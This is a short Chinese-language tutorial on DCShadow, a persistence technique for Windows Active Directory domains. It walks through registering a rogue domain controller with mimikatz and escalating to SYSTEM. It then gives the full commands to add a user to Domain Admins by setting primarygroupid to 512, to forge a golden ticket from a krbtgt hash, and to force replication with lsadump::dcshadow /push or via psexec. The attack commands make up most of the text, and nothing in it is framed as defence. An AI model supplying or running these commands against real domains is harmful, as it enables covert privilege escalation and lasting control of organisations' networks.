域权限维持(DCShadow)

DCShadow简述

DCShadow属于域权限维持的手段之一,利用该技术需要具有域管理员权限或者
企业管理员权限,创建恶意域控然后利用域控间正常同步数据的功能将恶意域控
上的恶意对象同步到正在运行的正常域控上。

DCShadow利用(mimikatz)

利用流程简述:
	1.通过DCShadow更改配置框架和注册SPN,从而实现在目标获得目录内注册一个
	伪造的恶意域控,并且使伪造的恶意域控能被其他正常域控认可,能够参与域复制。
	2.在伪造的域控上更改获得目录数据。
	3.强制触发域复制,使得指定的新对象或修改后的属性能够同步进入其他正常的域控。
mimikatz利用步骤:
	1.使用mimikatz获取System权限。
	2.使用mimikatz进行数据更改监听。
	3.新窗口导入域管权限执行mimikatz执行域控同步数据。		
利用步骤1:
	使用mimikatz使得当前进程具有System权限。
	!+
	!processtoken
	token::whoami		

利用步骤2:
	修改用户liangfeifan的primarygroupid值为512,即添加到Doamin Admins组中。
	lsadump::dcshadow /object:CN=liangfeifan,CN=Users,DC=test,DC=com /attribute:primarygroupid /value:512

利用步骤3:
	1.使用黄金票据+DCShadow
		黄金票据是可以进行DCShadow需要注意的ldap的域管白银票据是不行的因为rpc需要TGT的认证,
		因此只能黄金票据+DCShadow。
		打开新的mimikatz导入黄金票据:
		kerberos::golden /user:administrator /domain:test.com /sid:S-1-5-21-3042504039-1145428418-1324677547 /krbtgt:bdff817d8997011cb4405a615635143f /ptt
		进行同步:
		lsadump::dcshadow /push
	2.使用psexec打开域管cmd.exe进程并运行mimikatz.exe执行如下命令进行强制同步:
	lsadump::dcshadow /push

此时mimikatz监控端也将收到消息即将liangfeifan加到管理员组成功

总结

本篇文章讲述了黄金票据+DCShadow以及psexec的相关利用,
DCShadow是一种常见的域维持手段是通过伪造成恶意DC进行,
同步进行进而权限维持。